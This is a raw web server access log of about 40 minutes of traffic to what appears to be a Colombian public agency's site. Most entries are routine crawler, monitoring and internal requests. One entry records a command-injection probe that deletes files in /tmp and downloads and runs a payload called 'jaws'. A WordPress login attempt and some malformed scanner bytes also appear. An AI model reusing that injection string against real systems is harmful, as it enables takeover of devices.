201.245.192.253 - - [29/Aug/2022:05:25:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
103.29.68.35 - - [29/Aug/2022:05:25:50 -0500] "HEAD / HTTP/1.1" 200 -
200.114.47.8 - - [29/Aug/2022:05:25:57 -0500] "-" 408 -
87.250.224.104 - - [29/Aug/2022:05:26:11 -0500] "-" 408 -
66.249.73.161 - - [29/Aug/2022:05:26:15 -0500] "-" 408 -
207.46.13.115 - - [29/Aug/2022:05:26:15 -0500] "GET /BLA/resoluciones/878.tif HTTP/1.1" 404 1018
172.22.2.4 - - [29/Aug/2022:05:24:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51174
216.245.221.92 - - [29/Aug/2022:05:27:34 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Aug/2022:05:29:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42950
201.245.192.253 - - [29/Aug/2022:05:29:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42301
201.245.192.253 - - [29/Aug/2022:05:30:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:05:31:00 -0500] "GET /BLA/boletinlegal/sugerencias.php HTTP/1.1" 200 8615
172.22.2.4 - - [29/Aug/2022:05:29:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:05:30:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53994
216.245.221.92 - - [29/Aug/2022:05:32:34 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.105 - - [29/Aug/2022:05:32:40 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [29/Aug/2022:05:32:41 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [29/Aug/2022:05:34:04 -0500] "GET /BLA/boletinlegal/ab2g HTTP/1.1" 404 1018
172.22.2.4 - - [29/Aug/2022:05:33:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [29/Aug/2022:05:34:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [29/Aug/2022:05:33:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56367
201.245.192.253 - - [29/Aug/2022:05:35:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
213.180.203.65 - - [29/Aug/2022:05:36:11 -0500] "-" 408 -
172.22.2.4 - - [29/Aug/2022:05:35:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Aug/2022:05:37:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:05:36:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
201.245.192.253 - - [29/Aug/2022:05:39:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42950
201.245.192.253 - - [29/Aug/2022:05:39:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42301
173.252.127.10 - - [29/Aug/2022:05:39:27 -0500] "GET /images/mercados-campesinos-5-mayo.jpg HTTP/1.1" 200 95848
201.245.192.253 - - [29/Aug/2022:05:40:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
216.245.221.92 - - [29/Aug/2022:05:42:34 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.186 - - [29/Aug/2022:05:42:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2443.pdf HTTP/1.1" 200 438764
172.22.2.4 - - [29/Aug/2022:05:41:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
20.77.242.14 - - [29/Aug/2022:05:43:45 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
45.95.55.5 - - [29/Aug/2022:05:43:53 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [29/Aug/2022:05:42:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
172.22.2.4 - - [29/Aug/2022:05:44:45 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
201.245.192.253 - - [29/Aug/2022:05:45:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
216.245.221.92 - - [29/Aug/2022:05:47:34 -0500] "HEAD / HTTP/1.1" 200 -
139.59.183.38 - - [29/Aug/2022:05:47:46 -0500] "(\x14\xe4kQ\x8f\xc0\xc4]o\xc8\x93,\xf8u{0.Ub\x10" 501 953
139.59.183.38 - - [29/Aug/2022:05:47:47 -0500] "\x16\x03\x01" 400 226
139.59.183.38 - - [29/Aug/2022:05:47:47 -0500] "\x16\x03\x01" 400 226
139.59.183.38 - - [29/Aug/2022:05:47:47 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [29/Aug/2022:05:48:11 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%207%20del%2015%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 304 -
172.22.2.4 - - [29/Aug/2022:05:47:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:05:48:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55211
201.245.192.253 - - [29/Aug/2022:05:50:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
216.245.221.92 - - [29/Aug/2022:05:52:34 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.161 - - [29/Aug/2022:05:53:02 -0500] "-" 408 -
172.22.2.4 - - [29/Aug/2022:05:53:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
5.255.253.164 - - [29/Aug/2022:05:55:31 -0500] "-" 408 -
172.22.2.4 - - [29/Aug/2022:05:53:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [29/Aug/2022:05:55:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
216.245.221.92 - - [29/Aug/2022:05:57:34 -0500] "HEAD / HTTP/1.1" 200 -
62.231.95.189 - - [29/Aug/2022:05:59:10 -0500] "GET /catalogoisis/ HTTP/1.0" 200 8575
62.231.95.189 - - [29/Aug/2022:05:59:11 -0500] "GET / HTTP/1.0" 200 319
201.245.192.253 - - [29/Aug/2022:06:00:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:05:58:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:05:59:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
92.118.39.88 - - [29/Aug/2022:06:02:23 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [29/Aug/2022:06:02:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:06:05:24 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7443
172.22.2.4 - - [29/Aug/2022:06:05:25 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [29/Aug/2022:06:05:25 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
172.22.2.4 - - [29/Aug/2022:06:05:25 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [29/Aug/2022:06:05:25 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [29/Aug/2022:06:05:25 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [29/Aug/2022:06:05:25 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [29/Aug/2022:06:05:25 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [29/Aug/2022:06:05:25 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [29/Aug/2022:06:05:25 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [29/Aug/2022:06:05:25 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [29/Aug/2022:06:05:26 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [29/Aug/2022:06:05:26 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [29/Aug/2022:06:05:26 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [29/Aug/2022:06:05:26 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [29/Aug/2022:06:05:26 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [29/Aug/2022:06:05:26 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [29/Aug/2022:06:05:26 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [29/Aug/2022:06:05:26 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [29/Aug/2022:06:05:26 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [29/Aug/2022:06:05:26 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
